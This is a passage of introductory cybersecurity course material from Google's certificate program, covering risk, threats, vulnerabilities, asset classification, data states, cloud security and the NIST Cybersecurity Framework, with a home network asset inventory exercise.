By the end of this course, you’ll build an understanding of the wide range of assets organizations must
protect. You’ll explore many of the most common security controls used to protect valuable assets from
risk. You’ll also discover the variety of ways assets are vulnerable to threats by adopting an attacker
mindset.
Certificate program progress
The Google Cybersecurity Certificate program has eight courses. Assets, Threats, and Vulnerabilities is
the fifth course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — (current course) Learn about the importance of security
controls and developing a threat actor mindset to protect and defend an organization’s assets
from various threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Course 5 content
Each course of this certificate program is broken into modules. You can complete courses at your own
pace, but the module breakdowns are designed to help you finish the entire Google Cybersecurity
Certificate in about six months.
What’s to come? Here’s a quick overview of the skills you’ll learn in each module of this course.
Module 1: Introduction to asset security
You will be introduced to how organizations determine what assets to protect. You'll learn about the
connection between managing risk and classifying assets by exploring the unique challenge of securing
physical and digital assets. You'll also be introduced to the National Institute of Standards and
Technology (NIST) framework standards, guidelines, and best practices for managing cybersecurity risk.
Module 2: Protect organizational assets
You will focus on security controls that protect organizational assets. You'll explore how privacy impacts
asset security and understand the role that encryption plays in maintaining the privacy of digital assets.
You'll also explore how authentication and authorization systems help verify a user’s identity.
Module 3: Vulnerabilities in systems
You will build an understanding of the vulnerability management process. You'll learn about common
vulnerabilities and develop an attacker mindset by examining the ways vulnerabilities can become
threats to asset security if they are exploited.
Module 4: Threats to asset security
Finally, you will explore common types of threats to digital asset security. You'll also examine the tools
and techniques used by cybercriminals to target assets. In addition, you'll be introduced to the threat
modeling process and learn ways security professionals stay ahead of security breaches.
Hi. My name is Da'Queshia. I'm a security engineer. That basically means I work securing Google's
products so users like you aren't vulnerable. Before I entered cybersecurity, I worked installing
Internet. I also worked at a chip factory. I worked in fast food. I sold shoes at the mall. I did a lot of
things before I made it here. A lot of what I learned in my past jobs I actually use every day. Some of
it is my soft skills like time management, people skills, and communication. As a new cybersecurity
analyst, it's important to be able to communicate, take feedback, and feel uncomfortable, not with
the people around you, but with the problems you're trying to solve because sometimes it requires
you to think outside of the box and be challenged. I would describe my job as a Google security
guard because I work on the Gmail security team, it's my job to protect Gmail. Some of those threats
are sending you bad emails, who are trying to get your user credentials or get you to click on a
phishing link. When it comes to vulnerabilities, some of those could be something like unsanitized
input, which can lead to trouble. My typical work day starts like everyone else. I check my emails
and then from there I go into my bug queue; it's essentially when people tell me there's a problem
with one of our products. I start doing a little bit of research and then I like to explore the bug a
little bit more. I like to figure out if this can break this, can it also break this, and if it can, what else
can I do with it? Then from there, I look for a solution to make sure that I fix that hole and then any
other holes that we might have in our security. Some of the things you learned about in this course
is threat modeling, and that's something I use every day. Whenever I get a bug, it's part of my job to
figure out the attack tree and what type of vectors we use to take advantage of vulnerabilities. No
one is born knowing everything. I know that sounds really cliche or like super obvious, but it helps
me because it helps put some perspective the time and effort that everyone must put in in order to
learn something new. So be patient with yourself. Don't let anyone discourage you from
cybersecurity. Taking this course is one step closer to getting into your goal. Don't get discouraged
now. Keep going.
We all depend on technology so much nowadays. Examples of this are all around us. Personal
devices, like smartphones, help keep us in touch with friends and families across the globe.
Wearable technologies help us achieve personal goals and be more productive. Businesses have
also come to embrace technology in everyday life. From streamlining operations to
automating processes, our world is more connected because of technology. The more we rely on
technology, the more information we share. As a result, an enormous amount
of data is created every day. This huge surge in data creation presents unique challenges. As
businesses become more reliant on technology, cybercriminals become more sophisticated
in how they affect organizations. Data breaches are becoming increasingly serious due to all the
sensitive data businesses are storing. One positive aspect of these challenges is a growing need for
individuals like you! Security is a team effort. Unique perspectives, like yours, are an asset to any
organization. A team filled with diverse backgrounds, cultures, and experiences is more likely to
solve problems and be innovative. As breach after breach hits the headlines, it's clear that
organizations need more professionals focused on security. Companies around the globe are
working hard to keep up with the demands of a rapidly changing digital landscape. As the
environment continues to transform, the more your personal experience is valuable. In this section,
we'll start by exploring how assets, threats, and vulnerabilities factor into security plans. After that,
we'll discuss the use of asset inventories in protecting the wide range of assets that companies
have. Then, we'll consider the challenges in this rapidly changing digital world. And finally, you'll
gain an understanding of the building blocks of a security plan: its policies, standards, and
procedures. We'll examine the NIST Cybersecurity Framework that companies use to create
security plans that protect their customers and their brands.
Painting a portrait. Perfecting a new basketball move. Playing a solo on guitar.
They all share something in common. Can you guess what it is? If you thought "practice,"
you're absolutely correct! It takes time, dedication, and focus to improve these skills. The security
profession is no different. Planning for the future is a core skill that you'll need to practice all the
time in security. We all deal with uncertainty by trying to solve problems before they arise. For
example, if you're going on a trip, you might think about the length of the trip and how much to
pack. Maybe you're traveling somewhere cold. You might bring coats and sweaters to help keep you
warm. We all want to feel the security of knowing that there's a plan if something goes wrong.
Businesses are no different. Just like you, organizations try their best to plan ahead by analyzing
risk. Security teams help companies by focusing on risk. In security, a risk is anything that can
impact the confidentiality, integrity, or availability of an asset. Our primary focus as security
practitioners is to maintain confidentiality, integrity, and availability, which are the three
components of the CIA triad. The process of security risk planning is the first step toward
protecting these cornerstones. Each organization has their own unique security plan based on the
risk they face. Thankfully, you don't need to be familiar with every possible security plan to be a
good security practitioner. All you really need to know are the basics of how these plans are put
together. Security plans are based on the analysis of three elements: assets, threats, and
vulnerabilities. Organizations measure security risk by analyzing how each can have an effect on
confidentiality, integrity, and availability of their information and systems. Basically, they each
represent the what, why, and how of security. Let's spend a little time exploring each of these in
more detail. As you might imagine, an asset is an item perceived as having value to an organization.
This often includes a wide range of things. Buildings, equipment, data, and people are all examples of
assets that businesses want to protect. Let's examine this idea more by analyzing the assets of a
home. Inside a home, there's a wide range of assets, like people and personal belongings. The
outside structure of a home is made of assets too, like the walls, roof, windows, and doors. All these
assets have value, but they differ in how they might be protected. Someone might place a lower
priority on protecting the outside walls than on the front door, for example. This is because a
burglar is more likely to enter through the front door than a wall. That's why we have locks. With so
many types of assets to think of, security plans need to prioritize resources. After all, no matter how
large a security team is, it would be impossible to monitor every single asset at all hours of the day.
Security teams can prioritize their efforts based on threats. In security, a threat is any circumstance
or event that can negatively impact assets. Much like assets, threats include a wide range of things.
Going back to the example of a home, a threat can be a burglar who's trying to gain access. Burglars
aren't the only type of threat that affect the security of windows and doors. What if either broke by
accident? Strong winds can blow the door open during a bad storm. Or kids playing with a ball
nearby can accidentally damage a window.
The final element of a security plan that we're going to cover are vulnerabilities. In security, a
vulnerability is a weakness that can be exploited by a threat. A weak lock on a front door, for
example, is a vulnerability that can be exploited by a burglar. And old, cracked wood is a different
vulnerability on that same front door that can increase the chances of storm damage. In other
words, think of vulnerabilities as flaws within an asset. Assets can have many different types of
vulnerabilities that are an easy target for attackers. We'll explore different types of threats and
vulnerabilities in greater detail later. For now, just understand that security teams need to account
for a wide range of assets, threats, and vulnerabilities to effectively plan for the future.
Understand risks, threats, and vulnerabilities
When security events occur, you’ll need to work in close coordination with others to address the
problem. Doing so quickly requires clear communication between you and your team to get the job
done.
Previously, you learned about three foundational security terms:
●
●
●
Risk: Anything that can impact the confidentiality, integrity, or availability of an asset
Threat: Any circumstance or event that can negatively impact assets
Vulnerability: A weakness that can be exploited by a threat
These words tend to be used interchangeably in everyday life. But in security, they are used to describe
very specific concepts when responding to and planning for security events. In this reading, you’ll
identify what each term represents and how they are related.
Security risk
Security plans are all about how an organization defines risk. However, this definition can vary widely
by organization. As you may recall, a risk is anything that can impact the confidentiality, integrity, or
availability of an asset. Since organizations have particular assets that they value, they tend to differ in
how they interpret and approach risk.
One way to interpret risk is to consider the potential effects that negative events can have on a business.
Another way to present this idea is with this calculation:
Likelihood x Impact = Risk
For example, you risk being late when you drive a car to work. This negative event is more likely to
happen if you get a flat tire along the way. And the impact could be serious, like losing your job. All these
factors influence how you approach commuting to work every day. The same is true for how businesses
handle security risks.
In general, we calculate risk in this field to help:
●
●
●
●
Prevent costly and disruptive events
Identify improvements that can be made to systems and processes
Determine which risks can be tolerated
Prioritize the critical assets that require attention
The business impact of a negative event will always depend on the asset and the situation. Your primary
focus as a security professional will be to focus on the likelihood side of the equation by dealing with
certain factors that increase the odds of a problem.
Risk factors
As you’ll discover throughout this course, there are two broad risk factors that you’ll be concerned with
in the field:
●
●
Threats
Vulnerabilities
The risk of an asset being harmed or damaged depends greatly on whether a threat takes advantage of
vulnerabilities.
Let’s apply this to the risk of being late to work. A threat would be a nail puncturing your tire, since tires
are vulnerable to running over sharp objects. In terms of security planning, you would want to reduce
the likelihood of this risk by driving on a clean road.
Categories of threat
Threats are circumstances or events that can negatively impact assets. There are many different types of
threats. However, they are commonly categorized as two types: intentional and unintentional.
For example, an intentional threat might be a malicious hacker who gains access to sensitive information
by targeting a misconfigured application. An unintentional threat might be an employee who holds the
door open for an unknown person and grants them access to a restricted area. Either one can cause an
event that must be responded to.
Categories of vulnerability
Vulnerabilities are weaknesses that can be exploited by threats. There’s a wide range of vulnerabilities,
but they can be grouped into two categories: technical and human.
For example, a technical vulnerability can be misconfigured software that might give an unauthorized
person access to important data. A human vulnerability can be a forgetful employee who loses their
access card in a parking lot. Either one can lead to risk.
Key takeaways
Risks, threats, and vulnerabilities have very specific meanings in security. Knowing the relationship
between them can help you build a strong foundation as you grow essential skills and knowledge as a
security analyst. This can help you gain credibility in the industry by demonstrating that you have
working knowledge of the field. And it signals to your future colleagues that you’re a member of the
global security community.
Security starts with Asset Classification
It can be stressful when you have trouble finding something important. You're late to an
appointment and can't find your keys! We all find ourselves in situations like these at one time or
another. Believe it or not, organizations deal with the same kind of trouble. Take a few seconds to
think of the number of important assets you have nearby. I'm thinking of my phone, wallet, and
keys, for example. Next, imagine that you've just joined a security team for a small online retailer.
The company has been growing over the past few years, adding more and more customers. As a
result, they're expanding their security department to protect the increasing numbers of assets they
have. Let's say each of you are responsible for 10 assets. That's a lot of assets! Even in this small
business setting, that's an incredible amount of things that need protecting. A fundamental truth of
security is you can only protect the things you account for. Asset management is the process of
tracking assets and the risks that affects them. All security plans revolve around asset management.
Recall that assets include any item perceived as having value to an organization. Equipment, data,
and intellectual property are just a few of the wide range of assets businesses want to protect. A
critical part of every organization's security plan is keeping track of its assets. Asset management
starts with having an asset inventory, a catalog of assets that need to be protected. This is a central
part of protecting organizational assets. Without this record, organizations run the risk of losing
track of all that's important to them. A good way to think of asset inventories is as a
shepherd protecting sheep. Having an accurate count of the number of sheep help in a lot of ways.
For example, it will be easier to allocate resources, like food, to take care of them. Another benefit of
asset inventory might be that you'd get an alert if one of them goes missing. Once more, think of the
important assets you have nearby. Just like me, you're probably able to rate them according to the
level of importance. I would rank my wallet ahead of my shoes, for example. In security, this
practice is known as asset classification. In general, asset classification is the practice of labeling
assets based on the sensitivity and importance to an organization. Organizations label assets
differently. Many of them follow a basic classification scheme: public, internal-only, confidential, and
restricted. Public assets can be shared with anyone. Internal-only can be shared with anyone in the
organization but should not be shared outside of it. And confidential assets should only be accessed
by those working on a specific project. Assets classified as restricted are typically highly sensitive
and must be protected. Assets with this label are considered need-to-know. Examples include
intellectual property and health or payment information. For example, a growing online retailer
might mark internal emails about a new product as confidential because those working on the new
product should know about it. They might also label the doors at their offices with the restricted
sign to keep everyone out who doesn't have a specific reason to be in there. These are just a couple
of everyday examples that you may be familiar with from your prior experience. For the most part,
classification determines whether an asset can be disclosed, altered, or destroyed. Asset management
is a continuous process, one that helps uncover unexpected gaps in security for potential risks.
Keeping track of all that's important to an organization is an essential part of security planning.
Common classification requirements
Asset management is the process of tracking assets and the risks that affect them. The idea behind this
process is simple: you can only protect what you know you have.
Previously, you learned that identifying, tracking, and classifying assets are all important parts of asset
management. In this reading, you’ll learn more about the purpose and benefits of asset classification,
including common classification levels.
Why asset management matters
Keeping assets safe requires a workable system that helps businesses operate smoothly. Setting these
systems up requires having detailed knowledge of the assets in an environment. For example, a bank
needs to have money available each day to serve its customers. Equipment, devices, and processes need
to be in place to ensure that money is available and secure from unauthorized access.
Organizations protect a variety of different assets. Some examples might include:
●
●
●
●
Digital assets such as customer data or financial records.
Information systems that process data, like networks or software.
Physical assets which can include facilities, equipment, or supplies.
Intangible assets such as brand reputation or intellectual property.
Regardless of its type, every asset should be classified and accounted for. As you may recall, asset
classification is the practice of labeling assets based on sensitivity and importance to an organization.
Determining each of those two factors varies, but the sensitivity and importance of an asset typically
requires knowing the following:
●
●
●
●
What you have
Where it is
Who owns it, and
How important it is
An organization that classifies its assets does so based on these characteristics. Doing so helps them
determine the sensitivity and value of an asset.
Common asset classifications
Asset classification helps organizations implement an effective risk management strategy. It also helps
them prioritize security resources, reduce IT costs, and stay in compliance with legal regulations.
The most common classification scheme is: restricted, confidential, internal-only, and public.
●
●
Restricted is the highest level. This category is reserved for incredibly sensitive assets, like
need-to-know information.
Confidential refers to assets whose disclosure may lead to a significant negative impact on an
organization.
●
●
Internal-only describes assets that are available to employees and business partners.
Public is the lowest level of classification. These assets have no negative consequences to the
organization if they’re released.
How this scheme is applied depends greatly on the characteristics of an asset. It might surprise you to
learn that identifying an asset’s owner is sometimes the most complicated characteristic to determine.
Note: Although many organizations adopt this classification scheme, there can be variability at the
highest levels. For example, government organizations label their most sensitive assets as confidential
instead of restricted.
Challenges of classifying information
Identifying the owner of certain assets is straightforward, like the owner of a building. Other types of
assets can be trickier to identify. This is especially true when it comes to information.
For example, a business might issue a laptop to one of its employees to allow them to work remotely.
You might assume the business is the asset owner in this situation. But, what if the employee uses the
laptop for personal matters, like storing their photos?
Ownership is just one characteristic that makes classifying information a challenge. Another concern is
that information can have multiple classification values at the same time. For example, consider a letter
addressed to you in the mail. The letter contains some public information that’s okay to share, like your
name. It also contains fairly confidential pieces of information that you’d rather only be available to
certain people, like your address. You’ll learn more about how these challenges are addressed as you
continue through the program.
Key takeaways
Every business is different. Each business will have specific requirements to address when devising
their security strategy. Knowing why and how businesses classify their assets is an important skill to
have as a security professional. Information is one of the most important assets in the world. As a
cybersecurity professional, you will be closely involved with protecting information from damage,
disclosure, and misuse. Recognizing the challenges that businesses face classifying this type of asset is a
key to helping them solve their security needs.
Activity Overview
In this activity, you will classify assets connected to a home office network.
Asset management is a critical part of every organization's security plan. Remember that asset
management is the process of tracking assets and the risks that affect them. Effective asset management
starts with creating an asset inventory, or a catalog of assets that need to be protected. Then, it involves
classifying assets based on their level of importance and sensitivity to risk.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then, complete the step-by-step instructions.
One of the most valuable assets in the world today is information. Most information is accessed over a
network. There tend to be a variety of devices connected to a network and each is a potential entry point
to other assets.
An inventory of network devices can be a useful asset management tool. An inventory can highlight
sensitive assets that require extra protection.
You’re operating a small business from your home and must create an inventory of your network
devices. This will help you determine which ones contain sensitive information that require extra
protection.
To do this, you will start by identifying three devices that have access to your home network. This might
include devices such as:
●
●
●
●
●
●
Desktop or laptop computers
Smartphones
Smart home devices
Game consoles
Storage devices or servers
Video streaming devices
Then, you’ll list important characteristics of each device such as its owner, location, and type. Finally,
you will assign each device a level of sensitivity based on how important it is to protect.
Link to template: Home asset inventory
Step 2: Identify assets
In the asset inventory spreadsheet, find the Asset column header. Consider the devices that may be
connected to the home network. Examine devices in the scenario graphic to help you brainstorm.
Choose three devices that are not already listed in the spreadsheet and add them to the empty rows in
the Asset column.
Note: A few devices, like a network router, desktop, and a guest smartphone have already been added
for your reference.
Step 3: Fill in the characteristics of each asset
List important characteristics, including Network access, Owner, and Location for each asset that you’ve
identified.
Here’s an explanation of each characteristic:
●
●
●
Network access describes how often the device is connected to the network.
Owner describes the person responsible for the device.
Location describes where the device is located in relation to the router.
Step 4: Evaluate the access of network devices
Review the information that you’ve listed in the Network access, Owner, and Location columns.
In the Notes column, record 1 or 2 details or characteristics of each device. Do this by asking yourself
questions about each:
●
●
●
What kind of information is stored on the device?
How does it connect to the network?
Is the owner careful about securing it?
For example, the desktop computer contains sensitive information, like photos, that only the owner
should have access to. In contrast, the network router uses one frequency for smart home devices and
another for all other devices.
Note: Keep in mind that there might be some variation within each category. Try to identify details that
could impact the confidentiality, integrity, or availability of information that’s connected to the network.
Step 5: Classify the sensitivity of network devices
It’s time to classify assets based on the information you’ve collected. Do this by thinking about how an
asset could impact your business if its security was compromised:
●
●
●
What types of information would be disclosed or stolen?
Could an attacker alter information on the device?
What would happen to the business if this information were destroyed?
For example, the network router is classified as confidential because the owner has granted limited
access to the device to specific users.
Find the Sensitivity column in the asset inventory. Type one of the four levels of sensitivity you
previously learned about.
Note: You can use the Categories table as a guide for choosing an appropriate classification.
Pro Tip: Save the template
Finally, be sure to save a blank copy of the template you used to complete this activity. You can use it for
further practice or in your professional projects. These templates will help you work through your
thought processes and demonstrate your experience to potential employers.
What to Include in Your Response
Be sure to include the following elements in your completed activity:
●
●
●
●
List of 3 devices on the home network
List network access, owner, and location for each device
1–2 notes on network access
A sensitivity classification
Activity Exemplar: Classify the assets connected to a home network
Here is a completed exemplar along with an explanation of how the exemplar fulfills the
expectations for the activity.
Link to exemplar: Home asset inventory exemplar
Assessment of Exemplar
Compare the exemplar to your completed asset inventory. Review your work using each of
the criteria in the exemplar. What did you do well? Where can you improve? Use your
answers to these questions to guide you as you continue to progress through the course.
Note: The exemplar represents one possible way to complete the activity. Yours will likely
differ in certain ways. What’s important is that your asset inventory lists the common
characteristics of network connected devices and evaluates them based on their level of
sensitivity.
The exemplar uses detail from the given scenario and adheres to the following guidelines:
●
Identify 3 devices on the home network
●
●
●
List network access, owner, and location details for each device
Include 1–2 notes on network access
Classify each asset based on level of sensitivity
The exemplar only lists devices with network access because that fits within the scope of
this scenario. However, asset inventories might include non-network devices. For example,
a homeowner might also keep track of physical assets like a safe or digital assets like family
videos.
Classifying assets based on their level of importance can be subjective. Much of asset
classification depends on identifying an asset's owner, their location, and other important
characteristics. This information should be evaluated before determining who should have
access to an asset and what they are authorized to do. Remember, classification helps
determine the level of impact an asset can have on a business if it were disclosed, altered,
or destroyed.
Key Takeaways
Having an inventory of devices on your home network is a useful way to protect your
personal assets. It’s also a useful artifact that you can show to prospective employers when
interviewing for security analyst positions. Resources like this demonstrate your security
mindset and ability to think critically about asset vulnerabilities.
Assets in a Digital World
Welcome back! We've covered a lot of information so far. I hope you're having as much fun
exploring the role of security as I am! We've explored what
organizational assets are and why they need protection. You've also gotten a sense of the
tremendous amount of assets security teams protect. Previously, we began examining security
asset management and the importance of keeping track of everything that's important
to an organization. Security teams classify assets based on value. Next, let's expand our security
mindset and think about this question. What exactly is valuable about an asset? These days, the
answer is often information. Most information is in a digital form. We call this data. Data is
information that is translated, processed, or stored by a computer. We live in a connected world.
Billions of devices around the world are linked to the internet and are exchanging data with each
other all the time. In fact, millions of pieces of data are being passed to your device right now! When
compared to physical assets, digital assets have additional challenges. What you need to understand
is that protecting data depends on where that data is and what it's doing. Security teams protect
data in three different states: in use, in transit, and at rest. Let's investigate this idea in greater
detail. Data in use is data being accessed by one or more users. Imagine being at a park with your
laptop. It's a nice sunny day, and you stop at a bench to check your email. This is an example of data
in use. As soon as you log in, your inbox is considered to be in use. Next, is data in transit. Data in
transit is data traveling from one point to another. While you're signed into your account, a message
from one of your friends appears. They sent you an interesting article about the growing security
industry. You decide to reply, thanking them for sending this to you. When you click send, this is
now an example of data in transit. Finally, there's data at rest. Data at rest is data not currently being
accessed. In this state, data is typically stored on a physical device. An example of data at rest would
be when you finish checking your email and close your laptop. You then decide to pack up and go to
a nearby cafe for breakfast. As you make your way from the park towards the cafe, the data in your
laptop is at rest. So now that we understand these states of data, let's connect this back to asset
management. Earlier, I mentioned that information is one of the most valuable assets that
companies can have. Information security, or InfoSec, is the practice of keeping data in all states
away from unauthorized users. Weak information security is a serious problem. It can lead to things
like identity theft, financial loss, and reputational damage. These events have potential to harm
organizations, their partners, and their customers. And there's more to consider in your work as a
security analyst. As our digital world continually changes, we are adapting our understanding of
data at rest. Physical devices like our smartphones more commonly store data in the cloud,
meaning that our information isn't necessarily at rest just because our phone is resting on a table.
We should always be mindful of new vulnerabilities as our world becomes increasingly connected.
Remember, protecting data depends on where the data is and what it's doing. Keeping track of
information is part of the puzzle that companies solve when considering their security plan.
Understanding the three states of data enable security teams to analyze risk and determine an asset
management plan for different situations.
The emergence of cloud security
One of the most significant technology developments this century has been the emergence of cloud
computing. The United Kingdom's National Cyber Security Centre defines cloud computing as, “An ondemand, massively scalable service, hosted on shared infrastructure, accessible via the internet.”
Earlier, you learned that most information is in the form of data, which is in a constant state of change.
In recent years, businesses started moving their data to the cloud. The adoption of cloud-based services
has complicated how information is kept safe online. In this reading, you’ll learn about these challenges
and the opportunities they’ve created for security professionals.
Soaring into the cloud
Starting an online business used to be a complicated and costly process. In years past, companies had to
build and maintain their own internal solutions to operate in the digital marketplace. Now, it’s much
easier for anyone to participate because of the cloud.
The availability of cloud technologies has drastically changed how businesses operate online. These new
tools allow companies to scale and adapt quickly while also lowering their costs. Despite these benefits,
the shift to cloud-based services has also introduced a range of new cybersecurity challenges that put
assets at risk.
Cloud-based services
The term cloud-based services refers to a variety of on demand or web-based business solutions.
Depending on a company’s needs and budget, services can range from website hosting, to application
development environments, to entire back-end infrastructure.
There are three main categories of cloud-based services:
●
●
●
Software as a service (SaaS)
Platform as a service (PaaS)
Infrastructure as a service (IaaS)
Software as a service (SaaS)
SaaS refers to front-end applications that users access via a web browser. The service providers host,
manage, and maintain all of the back-end systems for those applications. Common examples of SaaS
services include applications like Gmail™ email service, Slack, and Zoom software.
Platform as a service (PaaS)
PaaS refers to back-end application development tools that clients can access online. Developers use
these resources to write code and build, manage, and deploy their own apps. Meanwhile, the cloud
service providers host and maintain the back-end hardware and software that the apps use to operate.
Some examples of PaaS services include Google App Engine™ platform, Heroku®, and VMware Cloud
Foundry.
Infrastructure as a service (IaaS)
IaaS customers are given remote access to a range of back-end systems that are hosted by the cloud
service provider. This includes data processing servers, storage, networking resources, and more.
Resources are commonly licensed as needed, making it a cost-effective alternative to buying and
maintaining on premises.
Cloud-based services allow companies to connect with their customers, employees, and business
partners over the internet. Some of the largest organizations in the world offer cloud-based services:
●
●
Google Cloud Platform
Microsoft Azure
Cloud security
Shifting applications and infrastructure over to the cloud can make it easier to operate an online
business. It can also complicate keeping data private and safe. Cloud security is a growing subfield of
cybersecurity that specifically focuses on the protection of data, applications, and infrastructure in the
cloud.
In a traditional model, organizations had their entire IT infrastructure on premises. Protecting those
systems was entirely up to the internal security team in that environment. These responsibilities are not
so clearly defined when part or all of an operational environment is in the cloud.
For example, a PaaS client pays to access the resources they need to build their applications. So, it is
reasonable to expect them to be responsible for securing the apps they build. On the other hand, the
responsibility for maintaining the security of the servers they are accessing should belong to the cloud
service provider because there are other clients using the same systems.
In cloud security, this concept is known as the shared responsibility model. Clients are commonly
responsible for securing anything that is directly within their control:
●
●
●
Identity and access management
Resource configuration
Data handling
Note: The amount of responsibility that is delegated to a service provider varies depending on the
service being used: SaaS, PaaS, and IaaS.
Cloud security challenges
All service providers do their best to deliver secure products to their customers. Much of their success
depends on preventing breaches and how well they can protect sensitive information. However, since
data is stored in the cloud and accessed over the internet, several challenges arise:
●
●
●
●
Misconfiguration is one of the biggest concerns. Customers of cloud-based services are
responsible for configuring their own security environment. Oftentimes, they use out-of-the-box
configurations that fail to address their specific security objectives.
Cloud-native breaches are more likely to occur due to misconfigured services.
Monitoring access might be difficult depending on the client and level of service.
Meeting regulatory standards is also a concern, particularly in industries that are required by
law to follow specific requirements such as HIPAA, PCI DSS, and GDPR.
Many other challenges exist besides these. As more businesses adopt cloud-based services, there’s a
growing need for cloud security professionals to meet a growing number of risks. Burning Glass, a
leading labor market analytics firm, ranks cloud security among the most in-demand skills in
cybersecurity.
Key takeaways
So much of the global marketplace has shifted to cloud-based services. Cloud technology is still new,
resulting in the emergence of new security models and a range of security challenges. And it’s likely that
other concerns might arise as more businesses become reliant on the cloud. Being familiar with the
cloud and the different services that are available is an important step towards supporting any
organizations efforts to protect information online.
Resources for more information
Cloud security is one of the fastest growing subfields of cybersecurity. There are a variety of resources
available online to learn more about this specialized topic.
●
●
●
The U.K.’s National Cyber Security Centre has a detailed guide for choosing, using, and deploying
cloud services securely based on the shared responsibility model.
The Cloud Security Alliance® is an organization dedicated to creating secure cloud
environments. They offer access to cloud security-specific research, certification, and products
to users with a paid membership.
CompTIA Cloud+ is a certificate program designed to teach you the foundational skills needed
to become a cloud security specialist.
Elements of a Security Plan
Security is all about people, processes, and technology. It's a team effort, and
I mean that literally. Protecting assets extends well beyond one person or a group of people in an IT
department. The truth of the matter is that security is a culture. It's a shared set of values that spans
all levels of an organization. These values touch everyone, from
employees, to vendors, to customers. Protecting digital and physical assets
requires everyone to participate, which can be a challenge. That's what security plans are for! Plans
come in many shapes and sizes, but they all share a common goal: to be prepared for risks when
they happen. Placing the focus on people is what leads to the most effective security plans.
Considering the diverse backgrounds and perspectives of everyone involved ensures that no one is
left out when something goes wrong. We talked earlier about the risk
as being anything that can impact the confidentiality, integrity, or availability of an asset. Most
security plans address risks by breaking them down according to categories and factors. Some
common risk categories might include, the damage, disclosure, or loss of information. Any of these
can be due to factors like the physical damage or malfunctions of a device. There are also factors
like attacks and human error. For example, a new school teacher may be asked to sign a contract
before their first day of class. The agreement may warn against some common risks associated with
human error, like using a personal email to send sensitive information. A security plan may require
that all new hires sign off on this agreement, effectively spreading the values that ensure everyone's
in alignment. This is just one example of the types and causes of risk that a plan might address.
These things vary widely depending on the company. But how these plans are communicated is
similar across industries. Security plans consist of three basic elements: policies, standards, and
procedures. These three elements are how companies share their security plans. These words tend
to be used interchangeably outside of security, but you'll soon discover that they each have a very
specific meaning and function in this context. A policy in security is a set of rules that reduce risk and
protects information. Policies are the foundation of every security plan. They give everyone in and
out of an organization guidance by addressing questions like, what are we protecting and why?
Policies focus on the strategic side of things by identifying the scope, objectives, and limitations of a
security plan. For instance, newly hired employees at many companies are required to sign off on
acceptable use policy, or AUP. These provisions outline secure ways that an employee may access
corporate systems. Standards are the next part. These have a tactical function, as they concern how
well we're protecting assets. In security, standards are references that inform how to set policies. A
good way to think of standards is that they create a point of reference. For example, many
companies use the password management standard identified in NIST Special Publication 800-63B
to improve their security policies by specifying that employees' passwords must be at least eight
characters long. The last part of a plan is its procedures. Procedures are step-by-step instructions to
perform a specific security task. Organizations usually keep multiple procedure documents that are
used throughout the company, like how employees can choose secure passwords, or how they can
securely reset a password if it's been locked. Sharing clear and actionable procedures with
everyone creates accountability, consistency, and efficiency across an organization. Policies,
standards, and procedures vary widely from one company to another because they are tailored to
each organization's goals. Simply understanding the structure
of security plans is a great start. For now, I hope you have a clearer picture of what policies,
standards, and procedures are, and how they are essential to making security a team effort.
The NIST Cybersecurity Framework
Having a plan is just one part of securing assets. Once the plan is in action, the other
part is making sure everyone's following along. In security, we call this compliance. Compliance is
the process of adhering to internal standards and external regulations. Small companies and large
organizations around the world place security compliance at the top of their list of priorities. At a
high-level, maintaining trust, reputation, safety, and the integrity of your data are just a few reasons
to be concerned about compliance. Fines, penalties, and
lawsuits are other reasons. This is particularly true for companies in highly regulated industries,
like health care, energy, and finance. Being out of compliance with a regulation can cause long
lasting financial and reputational effects that can seriously impact a business. Regulations are rules
set by a government or other authority to control the way something is done. Like policies,
regulations exist to protect people and their information, but on a larger scale. Compliance can be a
complex process because of the many regulations that exist all around the world. For our purpose,
we're going to focus on a framework of security compliance, the U.S. based NIST Cybersecurity
Framework. Earlier in the program, you learned the National Institute of Standards and Technology,
or NIST. One of the primary roles of NIST is to openly provide companies with a set of frameworks
and security standards that reflect key security related regulations. The NIST Cybersecurity
Framework is a voluntary framework that consists of standards, guidelines, and best practices to
manage cybersecurity risk. Commonly known as the CSF, this framework was developed to help
businesses secure one of their most important assets, information. The CSF consists of three main
components: the core, it's tiers, and it's profiles. Let's explore each of these together to build a better
understanding of how NIST's CSF is used. The core is basically a simplified version of the functions,
or duties, of a security plan. The CSF core identifies five broad functions: identify, protect, detect,
respond, and recover. Think of these categories of the core as a security checklist. After the core, the
next NIST component we'll discuss is its tiers. These provide security teams with a way to measure
performance across each of the five functions of the core. Tiers range from Level-1 to Level-4. Level-
1, or passive, indicates a function is reaching bare minimum standards. Level-4, or adaptive, is an
indication that a function is being performed at an exemplary standard. You may have noticed that
CSF tiers aren't a yes or no proposition; instead, there's a range of values. That's because tiers are
designed as a way of showing organizations what is and isn't working with their security plans.
Lastly, profiles are the final component of CSF. These provide insight into the current state of a
security plan. One way to think of profiles is like photos capturing a moment in time. Comparing
photos of the same
subject taken at different times can provide useful insights. For example, without these photos, you
might not notice how this tree has changed. It's the same with NIST profiles. Good security practice
is about more than avoiding fines and attacks. It demonstrates that you care about people and their
information. Before we go, let's visit the core's functions one more time to look at where we've been
and where we're going. The first function is identify. Our previous discussions on asset management
and risk assessment relates to that function. Coming up, we're going to focus on many of the
categories of the second function, the protect function.
Security guidelines in action
Organizations often face an overwhelming amount of risk. Developing a security plan from the beginning
that addresses all risk can be challenging. This makes security frameworks a useful option.
Previously, you learned about the NIST Cybersecurity Framework (CSF). A major benefit of the CSF is
